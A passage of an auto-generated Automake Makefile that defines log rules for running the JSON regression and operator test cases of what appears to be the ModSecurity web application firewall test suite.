$(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/variable-RESPONSE_BODY.json.log: test/test-cases/regression/variable-RESPONSE_BODY.json @p='test/test-cases/regression/variable-RESPONSE_BODY.json'; \ b='test/test-cases/regression/variable-RESPONSE_BODY.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/variable-RESPONSE_CONTENT_LENGTH.json.log: test/test-cases/regression/variable-RESPONSE_CONTENT_LENGTH.json @p='test/test-cases/regression/variable-RESPONSE_CONTENT_LENGTH.json'; \ b='test/test-cases/regression/variable-RESPONSE_CONTENT_LENGTH.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/variable-RESPONSE_CONTENT_TYPE.json.log: test/test-cases/regression/variable-RESPONSE_CONTENT_TYPE.json @p='test/test-cases/regression/variable-RESPONSE_CONTENT_TYPE.json'; \ b='test/test-cases/regression/variable-RESPONSE_CONTENT_TYPE.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/variable-RESPONSE_HEADERS.json.log: test/test-cases/regression/variable-RESPONSE_HEADERS.json @p='test/test-cases/regression/variable-RESPONSE_HEADERS.json'; \ b='test/test-cases/regression/variable-RESPONSE_HEADERS.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/variable-RESPONSE_HEADERS_NAMES.json.log: test/test-cases/regression/variable-RESPONSE_HEADERS_NAMES.json @p='test/test-cases/regression/variable-RESPONSE_HEADERS_NAMES.json'; \ b='test/test-cases/regression/variable-RESPONSE_HEADERS_NAMES.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/variable-RESPONSE_PROTOCOL.json.log: test/test-cases/regression/variable-RESPONSE_PROTOCOL.json @p='test/test-cases/regression/variable-RESPONSE_PROTOCOL.json'; \ b='test/test-cases/regression/variable-RESPONSE_PROTOCOL.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/variable-RULE.json.log: test/test-cases/regression/variable-RULE.json @p='test/test-cases/regression/variable-RULE.json'; \ b='test/test-cases/regression/variable-RULE.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/variable-SERVER_ADDR.json.log: test/test-cases/regression/variable-SERVER_ADDR.json @p='test/test-cases/regression/variable-SERVER_ADDR.json'; \ b='test/test-cases/regression/variable-SERVER_ADDR.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/variable-SERVER_NAME.json.log: test/test-cases/regression/variable-SERVER_NAME.json @p='test/test-cases/regression/variable-SERVER_NAME.json'; \ b='test/test-cases/regression/variable-SERVER_NAME.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/variable-SERVER_PORT.json.log: test/test-cases/regression/variable-SERVER_PORT.json @p='test/test-cases/regression/variable-SERVER_PORT.json'; \ b='test/test-cases/regression/variable-SERVER_PORT.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/variable-SESSIONID.json.log: test/test-cases/regression/variable-SESSIONID.json @p='test/test-cases/regression/variable-SESSIONID.json'; \ b='test/test-cases/regression/variable-SESSIONID.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/variable-STATUS.json.log: test/test-cases/regression/variable-STATUS.json @p='test/test-cases/regression/variable-STATUS.json'; \ b='test/test-cases/regression/variable-STATUS.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/variable-TIME_DAY.json.log: test/test-cases/regression/variable-TIME_DAY.json @p='test/test-cases/regression/variable-TIME_DAY.json'; \ b='test/test-cases/regression/variable-TIME_DAY.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/variable-TIME_EPOCH.json.log: test/test-cases/regression/variable-TIME_EPOCH.json @p='test/test-cases/regression/variable-TIME_EPOCH.json'; \ b='test/test-cases/regression/variable-TIME_EPOCH.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/variable-TIME_HOUR.json.log: test/test-cases/regression/variable-TIME_HOUR.json @p='test/test-cases/regression/variable-TIME_HOUR.json'; \ b='test/test-cases/regression/variable-TIME_HOUR.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/variable-TIME.json.log: test/test-cases/regression/variable-TIME.json @p='test/test-cases/regression/variable-TIME.json'; \ b='test/test-cases/regression/variable-TIME.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/variable-TIME_MIN.json.log: test/test-cases/regression/variable-TIME_MIN.json @p='test/test-cases/regression/variable-TIME_MIN.json'; \ b='test/test-cases/regression/variable-TIME_MIN.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/variable-TIME_MON.json.log: test/test-cases/regression/variable-TIME_MON.json @p='test/test-cases/regression/variable-TIME_MON.json'; \ b='test/test-cases/regression/variable-TIME_MON.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/variable-TIME_SEC.json.log: test/test-cases/regression/variable-TIME_SEC.json @p='test/test-cases/regression/variable-TIME_SEC.json'; \ b='test/test-cases/regression/variable-TIME_SEC.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/variable-TIME_WDAY.json.log: test/test-cases/regression/variable-TIME_WDAY.json @p='test/test-cases/regression/variable-TIME_WDAY.json'; \ b='test/test-cases/regression/variable-TIME_WDAY.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/variable-TIME_YEAR.json.log: test/test-cases/regression/variable-TIME_YEAR.json @p='test/test-cases/regression/variable-TIME_YEAR.json'; \ b='test/test-cases/regression/variable-TIME_YEAR.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/variable-TX.json.log: test/test-cases/regression/variable-TX.json @p='test/test-cases/regression/variable-TX.json'; \ b='test/test-cases/regression/variable-TX.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/variable-UNIQUE_ID.json.log: test/test-cases/regression/variable-UNIQUE_ID.json @p='test/test-cases/regression/variable-UNIQUE_ID.json'; \ b='test/test-cases/regression/variable-UNIQUE_ID.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/variable-URLENCODED_ERROR.json.log: test/test-cases/regression/variable-URLENCODED_ERROR.json @p='test/test-cases/regression/variable-URLENCODED_ERROR.json'; \ b='test/test-cases/regression/variable-URLENCODED_ERROR.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/variable-USERID.json.log: test/test-cases/regression/variable-USERID.json @p='test/test-cases/regression/variable-USERID.json'; \ b='test/test-cases/regression/variable-USERID.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/variable-variation-count.json.log: test/test-cases/regression/variable-variation-count.json @p='test/test-cases/regression/variable-variation-count.json'; \ b='test/test-cases/regression/variable-variation-count.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/variable-variation-exclusion.json.log: test/test-cases/regression/variable-variation-exclusion.json @p='test/test-cases/regression/variable-variation-exclusion.json'; \ b='test/test-cases/regression/variable-variation-exclusion.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/variable-WEBAPPID.json.log: test/test-cases/regression/variable-WEBAPPID.json @p='test/test-cases/regression/variable-WEBAPPID.json'; \ b='test/test-cases/regression/variable-WEBAPPID.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/variable-WEBSERVER_ERROR_LOG.json.log: test/test-cases/regression/variable-WEBSERVER_ERROR_LOG.json @p='test/test-cases/regression/variable-WEBSERVER_ERROR_LOG.json'; \ b='test/test-cases/regression/variable-WEBSERVER_ERROR_LOG.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/secrules-language-tests/operators/beginsWith.json.log: test/test-cases/secrules-language-tests/operators/beginsWith.json @p='test/test-cases/secrules-language-tests/operators/beginsWith.json'; \ b='test/test-cases/secrules-language-tests/operators/beginsWith.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/secrules-language-tests/operators/contains.json.log: test/test-cases/secrules-language-tests/operators/contains.json @p='test/test-cases/secrules-language-tests/operators/contains.json'; \ b='test/test-cases/secrules-language-tests/operators/contains.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/secrules-language-tests/operators/containsWord.json.log: test/test-cases/secrules-language-tests/operators/containsWord.json @p='test/test-cases/secrules-language-tests/operators/containsWord.json'; \ b='test/test-cases/secrules-language-tests/operators/containsWord.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/secrules-language-tests/operators/detectSQLi.json.log: test/test-cases/secrules-language-tests/operators/detectSQLi.json @p='test/test-cases/secrules-language-tests/operators/detectSQLi.json'; \ b='test/test-cases/secrules-language-tests/operators/detectSQLi.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/secrules-language-tests/operators/detectXSS.json.log: test/test-cases/secrules-language-tests/operators/detectXSS.json @p='test/test-cases/secrules-language-tests/operators/detectXSS.json'; \ b='test/test-cases/secrules-language-tests/operators/detectXSS.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/secrules-language-tests/operators/endsWith.json.log: test/test-cases/secrules-language-tests/operators/endsWith.json @p='test/test-cases/secrules-language-tests/operators/endsWith.json'; \ b='test/test-cases/secrules-language-tests/operators/endsWith.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/secrules-language-tests/operators/eq.json.log: test/test-cases/secrules-language-tests/operators/eq.json @p='test/test-cases/secrules-language-tests/operators/eq.json'; \ b='test/test-cases/secrules-language-tests/operators/eq.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/secrules-language-tests/operators/ge.json.log: test/test-cases/secrules-language-tests/operators/ge.json @p='test/test-cases/secrules-language-tests/operators/ge.json'; \ b='test/test-cases/secrules-language-tests/operators/ge.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/secrules-language-tests/operators/geoLookup.json.log: test/test-cases/secrules-language-tests/operators/geoLookup.json @p='test/test-cases/secrules-language-tests/operators/geoLookup.json'; \ b='test/test-cases/secrules-language-tests/operators/geoLookup.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/secrules-language-tests/operators/gt.json.log: test/test-cases/secrules-language-tests/operators/gt.json @p='test/test-cases/secrules-language-tests/operators/gt.json'; \ b='test/test-cases/secrules-language-tests/operators/gt.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/secrules-language-tests/operators/ipMatch.json.log: test/test-cases/secrules-language-tests/operators/ipMatch.json @p='test/test-cases/secrules-language-tests/operators/ipMatch.json'; \ b='test/test-cases/secrules-language-tests/operators/ipMatch.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/secrules-language-tests/operators/le.json.log: test/test-cases/secrules-language-tests/operators/le.json @p='test/test-cases/secrules-language-tests/operators/le.json'; \ b='test/test-cases/secrules-language-tests/operators/le.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/secrules-language-tests/operators/lt.json.log: test/test-cases/secrules-language-tests/operators/lt.json @p='test/test-cases/secrules-language-tests/operators/lt.json'; \ b='test/test-cases/secrules-language-tests/operators/lt.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/secrules-language-tests/operators/noMatch.json.log: test/test-cases/secrules-language-tests/operators/noMatch.json @p='test/test-cases/secrules-language-tests/operators/noMatch.json'; \ b='test/test-cases/secrules-language-tests/operators/noMatch.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/secrules-language-tests/operators/pmFromFile.json.log: test/test-cases/secrules-language-tests/operators/pmFromFile.json @p='test/test-cases/secrules-language-tests/operators/pmFromFile.json'; \ b='test/test-cases/secrules-language-tests/operators/pmFromFile.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/secrules-language-tests/operators/pm.json.log: test/test-cases/secrules-language-tests/operators/pm.json @p='test/test-cases/secrules-language-tests/operators/pm.json'; \ b='test/test-cases/secrules-language-tests/operators/pm.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/secrules-language-tests/operators/rx.json.log: test/test-cases/secrules-language-tests/operators/rx.json @p='test/test-cases/secrules-language-tests/operators/rx.json'; \ b='test/test-cases/secrules-language-tests/operators/rx.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/secrules-language-tests/operators/streq.json.log: test/test-cases/secrules-language-tests/operators/streq.json @p='test/test-cases/secrules-language-tests/operators/streq.json'; \ b='test/test-cases/secrules-language-tests/operators/streq.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/secrules-language-tests/operators/strmatch.json.log: test/test-cases/secrules-language-tests/operators/strmatch.json @p='test/test-cases/secrules-language-tests/operators/strmatch.json'; \ b='test/test-cases/secrules-language-tests/operators/strmatch.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/secrules-language-tests/operators/unconditionalMatch.json.log: test/test-cases/secrules-language-tests/operators/unconditionalMatch.json @p='test/test-cases/secrules-language-tests/operators/unconditionalMatch.json'; \ b='test/test-cases/secrules-language-tests/operators/unconditionalMatch.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/secrules-language-tests/operators/validateByteRange.json.log: test/test-cases/secrules-language-tests/operators/validateByteRange.json @p='test/test-cases/secrules-language-tests/operators/validateByteRange.json'; \ b='test/test-cases/secrules-language-tests/operators/validateByteRange.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/secrules-language-tests/operators/validateUrlEncoding.json.log: test/test-cases/secrules-language-tests/operators/validateUrlEncoding.json @p='test/test-cases/secrules-language-tests/operators/validateUrlEncoding.json'; \ b='test/test-cases/secrules-language-tests/operators/validateUrlEncoding.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/secrules-language-tests/operators/validateUtf8Encoding.json.log: test/test-cases/secrules-language-tests/operators/validateUtf8Encoding.json @p='test/test-cases/secrules-language-tests/operators/validateUtf8Encoding.json'; \ b='test/test-cases/secrules-language-tests/operators/validateUtf8Encoding.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/secrules-language-tests/operators/verifyCC.json.log: test/test-cases/secrules-language-tests/operators/verifyCC.json @p='test/test-cases/secrules-language-tests/operators/verifyCC.json'; \ b='test/test-cases/secrules-language-tests/operators/verifyCC.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/secrules-language-tests/operators/verifycpf.json.log: test/test-cases/secrules-language-tests/operators/verifycpf.json @p='test/test-cases/secrules-language-tests/operators/verifycpf.json'; \ b='test/test-cases/secrules-language-tests/operators/verifycpf.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/secrules-language-tests/operators/verifyssn.json.log: test/test-cases/secrules-language-tests/operators/verifyssn.json @p='test/test-cases/secrules-language-tests/operators/verifyssn.json'; \ b='test/test-cases/secrules-language-tests/operators/verifyssn.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/secrules-language-tests/operators/verifysvnr.json.log: test/test-cases/secrules-language-tests/operators/verifysvnr.json @p='test/test-cases/secrules-language-tests/operators/verifysvnr.json'; \ b='test/test-cases/secrules-language-tests/operators/verifysvnr.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/secrules-language-tests/operators/within.json.log: test/test-cases/secrules-language-tests/operators/within.json @p='test/test-cases/secrules-language-tests/operators/within.json'; \ b='test/test-cases/secrules-language-tests/operators/within.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/secrules-language-tests/transformations/base64DecodeExt.json.log: test/test-cases/secrules-language-tests/transformations/base64DecodeExt.json 